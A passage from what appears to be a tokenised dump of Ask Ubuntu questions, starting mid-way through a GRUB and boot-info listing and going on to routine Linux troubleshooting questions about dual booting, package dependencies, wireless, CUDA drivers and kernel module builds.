$ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi echo 'loading linux 3.5.0-26-generic ... ' linux /boot/vmlinuz-3.5.0-26-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-26-generic } menuentry 'ubuntu , with linux 3.5.0-26-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-26-generic-recovery-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi echo 'loading linux 3.5.0-26-generic ... ' linux /boot/vmlinuz-3.5.0-26-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-26-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-advanced-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } menuentry 'ubuntu , with linux 3.5.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-recovery-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi echo 'loading linux 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-17-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde / ext4 errors=remount-ro 0 1 # swap was on /dev/sda2 during installation uuid=7663b629-19c9-49fc-a744-2beb2dcdb317 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/grub.cfg 1 = boot/initrd.img-3.5.0-17-generic 1 = boot/initrd.img-3.5.0-26-generic 1 = boot/initrd.img-3.5.0-27-generic 1 = boot/vmlinuz-3.5.0-17-generic 1 = boot/vmlinuz-3.5.0-26-generic 1 = boot/vmlinuz-3.5.0-27-generic 2 = initrd.img 1 = initrd.img.old 1 = vmlinuz 2 = vmlinuz.old 2 =============================== stderr messages : =============================== awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in in summary , ubuntu has a swap partition ( sda2 ) in addition to its root partition ( sda1 ) where it resides . everything is fine there . windows7 made 3 partitions , the first ( sdb1 ) being for efi , the second ( sdb2 ) being reserved for windows which is not relevant , the third ( sdb3 ) being the actual windows installation . the file hierarchy of sdb1 is > ls -ar . : . .. efi ./efi : . .. boot microsoft ./efi/boot : . .. bootx64.efi ./efi/microsoft : . .. boot ./efi/microsoft/boot : . bcd bcd.log1 bootmgfw.efi bootstat.dat da-dk el-gr es-es fonts hu-hu ja-jp memtest.efi nl-nl pt-br ru-ru tr-tr zh-hk .. bcd.log bcd.log2 bootmgr.efi cs-cz de-de en-us fi-fi fr-fr it-it ko-kr nb-no pl-pl pt-pt sv-se zh-cn zh-tw etc through using grub-mkdevicemap the file `` device.map '' was generated in `` /boot/grub '' which identified that the ssd is ( hd0 ) and the hdd is ( hd1 ) . hd0 is primary boot device , grub2 lives here . in grub-customizer i tried to create an entry which would direct grub2 to the windows7 bootloader : set root= ' ( hd1,1 ) ' search-no-floppy-fs-uuid-set f428-fb77 drivemap -s ( hd1 ) $ { root } chainloader +1 however selecting it from grub on restart gave this error : error : no such device : f428-fb77 . error : invalid signature . press any key to continue ... _ am i close ?
281737	how to remove ubuntu partitions and use them to install windows	i have installed ubuntu 12.10 on my laptop , but would like to install windows for the purpose of gaming ( hallelujah ) . but i have n't left any unpartitioned parts of the hdd so now i am stuck on ( how to remove one partition from ubuntu and use it to install win7 in a safe way ? ) i do not want to reinstall everything all over again , but definitely want to play games on my laptop . i do not want alternatives with wine or playonlinux , cuz i have runned a few games and they were all buggy , i want dual-boot . fdisk -l output : **disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xe2cf4679 device boot start end blocks id system /dev/sda1 * 2048 2000895 999424 83 linux /dev/sda2 2002942 1465147391 731572225 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 2002944 4001791 999424 82 linux swap / solaris /dev/sda6 4003840 6002687 999424 82 linux swap / solaris /dev/sda7 6004736 406003711 199999488 83 linux /dev/sda8 406005760 606003199 99998720 83 linux /dev/sda9 606005248 706002943 49998848 83 linux /dev/sda10 706004992 879212543 86603776 83 linux /dev/sda11 879214592 1035462655 78124032 83 linux /dev/sda12 1035464704 1075462143 19998720 83 linux /dev/sda13 1075464192 1115461631 19998720 83 linux /dev/sda14 1115463680 1269835775 77186048 83 linux /dev/sda15 1269837824 1465147391 97654784 83 linux**
281738	missing dependency packages on installing skype-call-recorder	i am trying to install skype-call-recorder , following this site however , i am getting the dependency error ; ~/downloads $ sudo dpkg -i skype-call-recorder-ubuntu_0.8_i386.deb ( reading database ... 158095 files and directories currently installed . ) preparing to replace skype-call-recorder 0.8 ( using skype-call-recorder-ubuntu_0.8_i386.deb ) ... unpacking replacement skype-call-recorder ... dpkg : dependency problems prevent configuration of skype-call-recorder : skype-call-recorder depends on libqt4-gui ( > = 4.3 ) ; however : package libqt4-gui is not configured yet . dpkg : error processing skype-call-recorder ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : skype-call-recorder then i tried : sudo apt-get install libqt4-guireading package lists ... done building dependency tree reading state information ... done libqt4-gui is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqt4-gui : depends : libqt4-designer ( = 4:4.7.4-0ubuntu8.3 ) but it is not going to be installed depends : libqt4-opengl ( = 4:4.7.4-0ubuntu8.3 ) but 4:4.7.4-0ubuntu8 is to be installed depends : libqt4-svg ( = 4:4.7.4-0ubuntu8.3 ) but 4:4.7.4-0ubuntu8 is to be installed depends : libqtgui4 ( = 4:4.7.4-0ubuntu8.3 ) but 4:4.7.4-0ubuntu8 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . can you tell , what am i missing or how should i install it ? my ubuntu release is 11.10 and i have 32 bit laptop .
281739	probleme update ubuntu package	i 've created a remote server on amazon cloud , when i connect into the vm , and type `` sudo apt-get update '' i get : where is the problem here ? i did n't inderstand any thing ! !
281740	nautilus ' remote folder default mount point	i connect a remote folder in nautilus ( file info says that it is done via sftp ) , and within it the folder becomes fully browseable . but i ca n't access it from the other applications : i could n't find the mount point . i wonder what is the default mount point ? upd : i use ubuntu 13.04
281742	sudo : no tty present and no askpass program specified	when attempting to run a remote binary using sudo on the remote box : ssh remotehost `` sudo ./binary '' i see this error : sudo : no tty present and no askpass program specified how can i work around this ?
281746	should i choose kde or qt for an ubuntu application ?	i 'm writing an application using qml and some c++ code . the main window will be all qml ( possibly having a main menu bar provided kxmlguiwindow ) , with the backend and some dialogs written in c++ . i 've been using kde because i 'm using the kde desktop and i like some of the extra features kde provides , like kconfig xt . however , i 'm planning on selling my application in the ubuntu software center , so i assume my main target will be the standard ubuntu with unity . knowing this , should i limit myself to using just qt or is using the kde frameworks not something to worry about ? i 've asked a similar question , and i understand kde applications are allowed , but is there a good enough reason to choose pure qt and not use the extra features kde provides ?
281748	how to toggle runtime-pm on shutdown/boot	i 'm experiencing an issue with the runtime pm option ( via powertop or laptop-mode ) on ubuntu 12.04 . as far as i know , it 's just a bug ( although i think it affects lenovo laptops more from what i 've read ) . basically , if runtime pm is on when the system shuts down , it will reboot shortly after the power goes off . this is a pain , because i 'm trying to maximize my battery life and i think that it might . there does n't seem to be a way to fix this , but i was hoping i could avoid it through a makeshift method of turning on the runtime-pm whenever ubuntu boots , and shutting it off whenever i shut the laptop down ( aka before the os actually shuts down ) . how can i do this ?
281763	is there any prebuilt qemu ubuntu image ( 32bit ) online ?	i am playing with qemu . here i found some prebuilt os images : http : //docs.openstack.org/trunk/openstack-compute/admin/content/starting-images.html but they are all for 64 bit system while my system is 32 bit . does anyone know there is any 32 bit prebuilt image online ? then i can directly use them and do not need to bother with the installation : > thanks ,
281764	12.10 wireless keeps disconnecting -	i 'm writing this on a wired connection because the wireless keeps disconnecting . has anyone else had this problem and is there a fix ? here 's my network details : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 09 serial : b8:88 : e3:6d : d7 : f5 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168f-1_0.0.5 06/18/12 ip=192.168.1.78 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : c0104000-c0104fff memory : c0100000-c0103fff *-network description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 50 : b7 : c3:56 : a3:4f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-27-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c0000000-c007ffff memory : c0080000-c008ffff the wireless disconnects and then never reconnects , but attempts to do so constantly . edit : the computer is a samsung 350v5c . lsmod : module size used by rfcomm 46620 0 parport_pc 32689 0 bnep 18141 2 ppdev 17074 0 snd_hda_codec_hdmi 32049 1 snd_hda_codec_realtek 78147 1 uvcvideo 76750 0 videobuf2_core 32852 1 uvcvideo videodev 120310 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc arc4 12530 2 ath3k 12919 0 btusb 22475 0 rts5139 356200 0 ath9k 131317 0 mac80211 540032 1 ath9k bluetooth 209249 12 rfcomm , bnep , ath3k , btusb joydev 17458 0 snd_hda_intel 33492 3 ath9k_common 14056 1 ath9k i915 520615 4 ath9k_hw 395357 2 ath9k , ath9k_common snd_hda_codec 134213 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel coretemp 13401 0 drm_kms_helper 49113 1 i915 kvm_intel 132760 0 snd_hwdep 17699 1 snd_hda_codec drm 288721 5 i915 , drm_kms_helper snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec kvm 414071 1 kvm_intel ath 23828 3 ath9k , ath9k_common , ath9k_hw snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi ghash_clmulni_intel 13221 0 aesni_intel 51038 0 cryptd 20404 2 ghash_clmulni_intel , aesni_intel snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event cfg80211 206797 3 ath9k , mac80211 , ath snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq lp 17760 0 samsung_laptop 14533 0 parport 46346 3 parport_pc , ppdev , lp snd 78921 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 95595 0 aes_x86_64 17256 1 aesni_intel i2c_algo_bit 13414 1 i915 microcode 22804 0 mac_hid 13206 0 soundcore 15048 1 snd video 19391 2 i915 , samsung_laptop snd_page_alloc 18485 2 snd_hda_intel , snd_pcm mei 40691 0 wmi 19071 0 lpc_ich 17062 0 serio_raw 13216 0 hid_generic 12541 0 usbhid 46987 0 hid 100411 2 hid_generic , usbhid ahci 25721 2 libahci 31192 1 ahci r8169 61651 0
281765	cuda : nvidia card has fallen off the bus	i am starting programming with cuda but i am facing a very hard to fix problem : after some time the systems gives the error : nvrm : gpu at 0000:03:00.0 has fallen off the bus and the computer needs to be powered off to detect again the nvidia card . at first i though it was a fault in my code : if i ran the same executable for 1000 times , the first 200 iterations were ok giving the same output , but then the system gave the aforementioned error and all the remaining iteration were giving errors . i then took the matrixmul example from cuda , compiled it , and ran it 1000 times . the same error happened around iteration 200 ! . that pointed me to some driver problem . therefore , and unfortunately without any success , i tested the same procedure with : several drivers , some old ( which google results stated could fix the problem ) , the latest long lived , the latest experimental , beta , etc . cuda 5 and cuda 4.2 with the aforementioned drivers i booted on text only without i removed xorgserver completely enabled persistent mode . seeral solutions proposed in the forums and after google search . none of the previous worked . please remember the very simple test : i compile the matrixmul example ( with jusf make ) and run the executable for 1000 times . i tested this also on my macbook pro and everything went fine ( although of course different so , card , etc ) . i am clueless right now . what i have n't tested yet : another kernel version . another linux distribution ( desperate solution ) . this is my system info : ubuntu 12.04.2 cuda 5 current driver version : 313.30 ( downloaded directly from nvidia ) ubuntu kernel : 3.2. g++ version : 4.6 nvidia card : quadro 4000 ( gf 100 ) please , if you have any suggestion , let me know . thanks in advance .
281776	raring wubi wo n't work	i was trying to install raring to my system using wubi , but i ca n't find the option to do so . is there a reason i can not find the windows installer for raring ?
281781	touchpad recognized as generic mouse	i have installed ubuntu 12.04.2 in my laptop lenovo ideapad z500 and everything worked fine , but for some problems i had to reinstall nvidia drivers , xserver-xorg and ubuntu-desktop . then , my touchpad stopped working and i found a solution running de following commands : sudo modprobe-r psmouse sudo modprobe psmouse proto proto=imps now , my touchpad works but i ca n't use scrolling with 2 fingers and multitouch features . i think it 's because it 's been recognized as a generic mouse , not synaptics touchpad . if i run command $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ video bus id=9 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=13 [ slave keyboard ( 3 ) ] thanks .
281786	how to convert daily build to a stable release ?	say , for example , i installed 13.04 daily build today . in 10+ days from today , 13.04 will be officially released ( as stable ) . after the release , do i need to do some sort of distribution upgrade ? or is it just a regular ( a few packages ) update ? is it worth installing the daily build now , or should i wait 10 days and install clean ? is there a difference ?
281787	ca n't install uvc drivers : `` implicit declaration of function 'x ' [ -werror=implicit-function-declaration ] ''	i am working on a project for my final year project which involves the use of a web-cam . i bought an external one and tried to install new drivers for it . now my integrated web-cam wo n't work . my webcam is an acer crystal eye . i have tried re-installing the uvc drivers following these steps : git clone git : //linuxtv.org/media_build.git cd media_build ./build however i get the following error during the build : /home/tom/downloads/media_build/v4l/mt9p031.c : in function 'mt9p031_clk_setup ' : /home/tom/downloads/media_build/v4l/mt9p031.c:226:2 : error : implicit declaration of function 'devm_clk_get ' [ -werror=implicit-function-declaration ] /home/tom/downloads/media_build/v4l/mt9p031.c:226:15 : warning : assignment makes pointer from integer without a cast [ enabled by default ] /home/tom/downloads/media_build/v4l/mt9p031.c : in function 'mt9p031_power_on ' : /home/tom/downloads/media_build/v4l/mt9p031.c:287:3 : error : implicit declaration of function 'clk_prepare_enable ' [ -werror=implicit-function-declaration ] /home/tom/downloads/media_build/v4l/mt9p031.c : in function 'mt9p031_power_off ' : /home/tom/downloads/media_build/v4l/mt9p031.c:310:3 : error : implicit declaration of function 'clk_disable_unprepare ' [ -werror=implicit-function-declaration ] /home/tom/downloads/media_build/v4l/mt9p031.c : in function 'mt9p031_probe ' : /home/tom/downloads/media_build/v4l/mt9p031.c:961:2 : error : implicit declaration of function 'devm_regulator_get ' [ -werror=implicit-function-declaration ] /home/tom/downloads/media_build/v4l/mt9p031.c:961:15 : warning : assignment makes pointer from integer without a cast [ enabled by default ] /home/tom/downloads/media_build/v4l/mt9p031.c:962:15 : warning : assignment makes pointer from integer without a cast [ enabled by default ] /home/tom/downloads/media_build/v4l/mt9p031.c:963:18 : warning : assignment makes pointer from integer without a cast [ enabled by default ] /home/tom/downloads/media_build/v4l/mt9p031.c:1035:3 : error : implicit declaration of function 'devm_gpio_request_one ' [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 3 ] : *** [ /home/tom/downloads/media_build/v4l/mt9p031.o ] error 1 make [ 2 ] : *** [ _module_/home/tom/downloads/media_build/v4l ] error 2 make [ 2 ] : leaving directory `/usr/src/linux-headers-3.2.0-40-generic' make [ 1 ] : *** [ default ] error 2 make [ 1 ] : leaving directory `/home/tom/downloads/media_build/v4l' make : *** [ all ] error 2 build failed at ./build line 452 . if anybody could help i would really appreciate it as i do n't have much time left to work on the project !
281788	how to upgrade kernel version ?	my question is how to upgrade kernel versions for ubuntu 12.04 ? my computer specifications are : ubuntu 12.04 kernel version linux 3.2.0-40-generic amd processor 64 bit processor . i have checked out the link , from youtube . the video that i have found helpfully and good instructions . but i am a little sceptical if it 's the right method on upgrading kernel version . video on kernel upgrade
281794	intel and amd graphics comparison	i have a lenovo thinkpad t61 with the integrated intel x3100 graphics . i also have an advanced dock in which i can put a pci-e graphics card . how well will ubuntu behave when being booted up with an amd graphics card and the proprietary drivers sometimes and then other times just with the integrated intel card ?
281795	installing miramath in ubuntu 12.10	i tried building this application via downloading from http : //sourceforge.net/projects/miramath/ ? source=dlp & in the process have already downloaded +500mb data but at one point i am constantly failing ... this was the output that i finally got after install many dependencies : sudo python main.py traceback ( most recent call last ) : file `` main.py '' , line 28 , in < module > from mainwindow import * file `` /home/usama/downloads/miramath/mainwindow.py '' , line 24 , in < module > import worksheet file `` /home/usama/downloads/miramath/worksheet.py '' , line 37 , in < module > import polarplot file `` /home/usama/downloads/miramath/polarplot.py '' , line 30 , in < module > from polarplotwidget import polarplotwidget file `` /home/usama/downloads/miramath/polarplotwidget.py '' , line 29 , in < module > class polarplotwidget ( qwt.qwtpolarplot ) : attributeerror : 'module ' object has no attribute 'qwtpolarplot' so i downloaded pyqwt via http : //sourceforge.net/projects/miramath/files/pyqwt-polar/ as per the manual i navigated to the configure folder & ran : python configure.py -q ../qwt-5.2 command line options : { 'debug ' : false , 'disable_numarray ' : false , 'disable_numeric ' : false , 'disable_numpy ' : false , 'excluded_features ' : [ ] , 'extra_cflags ' : [ ] , 'extra_cxxflags ' : [ ] , 'extra_defines ' : [ ] , 'extra_include_dirs ' : [ ] , 'extra_lflags ' : [ ] , 'extra_lib_dirs ' : [ ] , 'extra_libs ' : [ ] , 'jobs ' : '' , 'module_install_path ' : '' , 'modules ' : [ ] , 'qt ' : 4 , 'qwt_sources ' : '../qwt-5.2 ' , 'sip_include_dirs ' : [ ] , 'subdirs ' : [ ] , 'timelines ' : [ ] , 'trace ' : '' } found sip-4.13.3 . found 'posix ' operating system : 2.7.3 ( default , sep 26 2012 , 21:53:58 ) [ gcc 4.7.2 ] do not get upset by error messages in the next 3 compiler checks : check if 'size_t ' and 'unsigned int ' are the same type : yes check if 'size_t ' and 'unsigned long ' are the same type : size_t_check.cpp:3:6 : error : prototype for ‘void a : :f ( long unsigned int ) ’ does not match any in class ‘a’ size_t_check.cpp:2:24 : error : candidate is : void a : :f ( size_t ) no check if 'size_t ' and 'unsigned long long ' are the same type : size_t_check.cpp:3:6 : error : prototype for ‘void a : :f ( long long unsigned int ) ’ does not match any in class ‘a’ size_t_check.cpp:2:24 : error : candidate is : void a : :f ( size_t ) no failed to import numarray : pyqwt will be build without support for numarray . failed to find numeric2 : pyqwt will be build without support for numeric . found numpy-1.6.2 . g++ -c -pipe -o2 -wall -w -d_reentrant -dqt_webkit -dqt_no_debug -dqt_core_lib -dqt_shared -i/usr/share/qt4/mkspecs/linux-g++ -i . -i/usr/include/qt4/qtcore -i/usr/include/qt4 -i../qwt-5.2/src -i/usr/include/python2.7 -i/usr/lib/python2.7/dist-packages/numpy/core/include -i . -o qwt_version_info.o qwt_version_info.cpp g++ -wl , -o1 -o qwt_version_info qwt_version_info.o -l/usr/lib/i386-linux-gnu -lqtcore -lpthread found qwt-5.2.1 . extended command line options : { 'debug ' : false , 'disable_numarray ' : false , 'disable_numeric ' : false , 'disable_numpy ' : false , 'excluded_features ' : [ '-x has_pyqt_031105 ' , '-x has_numarray ' , '-x has_numeric ' , '-x has_qwt4 ' ] , 'extra_cflags ' : [ ] , 'extra_cxxflags ' : [ ] , 'extra_defines ' : [ 'has_numpy ' ] , 'extra_include_dirs ' : [ '/usr/include/python2.7 ' , '/usr/lib/python2.7/dist-packages/numpy/core/include ' ] , 'extra_lflags ' : [ ] , 'extra_lib_dirs ' : [ ] , 'extra_libs ' : [ ] , 'iqt ' : 'iqt5qt4 ' , 'iqt_sipfile ' : '../sip/iqt5qt4/iqtmodule.sip ' , 'jobs ' : '' , 'module_install_path ' : '/usr/lib/python2.7/dist-packages/pyqt4/qwt5 ' , 'modules ' : [ 'iqt ' , 'qwt5 ' ] , 'qt ' : 4 , 'qwt ' : 'qwt5qt4 ' , 'qwt_sipfile ' : '../sip/qwt5qt4/qwtmodule.sip ' , 'qwt_sources ' : '../qwt-5.2 ' , 'sip_include_dirs ' : [ ] , 'subdirs ' : [ 'iqt5qt4 ' , 'qwt5qt4 ' ] , 'timelines ' : [ '-t qwt_5_2_0 ' ] , 'trace ' : '' } the following modules will be built : [ 'iqt ' , 'qwt5 ' ] . setup the pyqwt package build . sip invokation : '/usr/bin/sip -b tmp-iqt5qt4/iqt5qt4.sbf -c tmp-iqt5qt4 ../sip/iqt5qt4/iqtmodule.sip' sh : 1 : /usr/bin/sip : not found sip failed to generate the c++ code . how can i resolve this ? the above problems were resolved via installing : python-qt4-dev libqwt-dev python-sip-dev python-dev after successfully building pyqwt i faced a new error while running miramath python main.py running ... traceback ( most recent call last ) : file `` main.py '' , line 77 , in < module > main ( sys.argv ) file `` main.py '' , line 51 , in main main = mainwindow ( ) file `` /home/usama/downloads/miramath/mainwindow.py '' , line 55 , in __init__ self.addtab ( ) file `` /home/usama/downloads/miramath/mainwindow.py '' , line 436 , in addtab w = worksheet.worksheet ( self , self.runtimestatusmessage , self.numequationsstatusmessage , self.currentequationstatusmessage ) file `` /home/usama/downloads/miramath/worksheet.py '' , line 94 , in __init__ self.execution_thread = execthread.execthread ( self ) file `` /home/usama/downloads/miramath/execthread.py '' , line 56 , in __init__ exec symbolics_init_program in self.symbolics_global_namespace # execfile goes away in 3.0 file `` < string > '' , line 91 , in < module > attributeerror : 'module ' object has no attribute 'abs' problem is resolved @ green7 answer 's below
281796	launcher does n't respond and acts oddly	i have recently downloaded the 12.04 ubuntu version and decided to try using ubuntu after hearing many good things about it . so far , i 've been frustrated with the results . the unity launcher does n't respond on my computer at all , especially when i try to click the transmission icon . i click it and nothing happens . it randomly happens to other applications as well . it does open when i click on the icon with the right mouse button and choose `` start transmission minimized '' though . also , the menu is really jumpy and when i click something , it just scrolls up or down and ends up opening something else . i have been really disappointed with this unity feature so far and i just want to switch back to my old os because of it . can someone help me ? i really want to give ubuntu 12.04 a chance . but it just seems so wrong . as far as i recall , this did n't happen before the last update ( at least i did n't notice it all that much before ) . also , i have this thing happening to me all the time : and my last issue is that each time i 'm trying to open an external file ( aka : i download a word document from my company 's website ) , it just does n't open it with the icon that was already in the menu when the os was installed ( i did n't move it and did n't do anything with it ) . it just randomly creates another icon . as far as i understand , the unity launcher is a combined launcher and task bar . so the same icon is used to launch an application and to restore it , in case it in minimised or hidden . now , when i open an odt file from my browser , by either opening it or saving to my computer and then opening , it does n't use the libreoffice writer icon i already have , but it shows a new , additional libreoffice writer icon . also , clicking the icon i already have closes all instances of writer . what am i doing wrong ? please help me : ( edit : i am checking now to see whether a recent kernel update has broken the launcher for me , by switching to an older version .
281797	xubuntu 13.04 dual screen hdmi	im trying to set up a dual screen for my netbook ( asus eee pc x101ch ) i tried using 'grandr ' but cant seem to get the screens to split . ive looked around but there doesnt seem to be much on the subject . what is the best way to go around 'splitting ' the screens ? my graphics driver is cedar trail drm and most of the solutions i found are for nvidia . any help would be greatly appreciated .
281799	migrating ubuntu music library to an external hard drive ?	i have a very small internal hard drive , and i want to migrate my music library to an external hard drive . how would i do this ?
281812	is deleting my entire home folder contents like resetting everything to where it was during install ?	or does kubuntus install process generates something in there that is not generated like it is now after i deleted everything . sidequestion that led me to this is . does 13.04 do n't have the /home/user/bin automatically added to the path like it was before ? because i copied my scripts there and they are not working . there is no .profile like it was before , because i deleted everything or because there simply is non in 13.04 ? if it is there normally where it comes from , how do i reset my home to defaults then ? maybe this is generated during the creation of a user ? any other things that might be missing now ?
281815	can not find remaining hard drive space after installing in a partition ?	complete ubuntu newbie here . i 'm installing ubuntu 12.04 on an 11 year-old pc . specs to my knowledge are : processor : intel pentium 4 2.0 ghz ram : 512 ram motherboard : asrock p4vm800 video card : ati radeon 9550 ( 250mb ) hard drive : single , 160gb that single hard drive is split into 2 partitions : 40 and 120 gb respectively . i use the 120gb partition for backing up pictures and documents . the 40gb partition once held windows xp as the thing 's primary os . both were set to ntfs . on the ubuntu setup , i chose `` something else '' because i just wanted to wipe out the 40gb partition while still using my 120gb partition as is . i had read in a guide to leave some swap space available for the os , preferably the same size as the physical ram . so i created a 39.4gb partition for the os ( primary , beginning , ext4 ) and allocated 600mb for the swap . the guide i read said that linux would only take up 4.5gb of hard drive space , so i was pretty happy with that . so , fast forward a little bit . the os installs just fine . now here 's what gets me . i 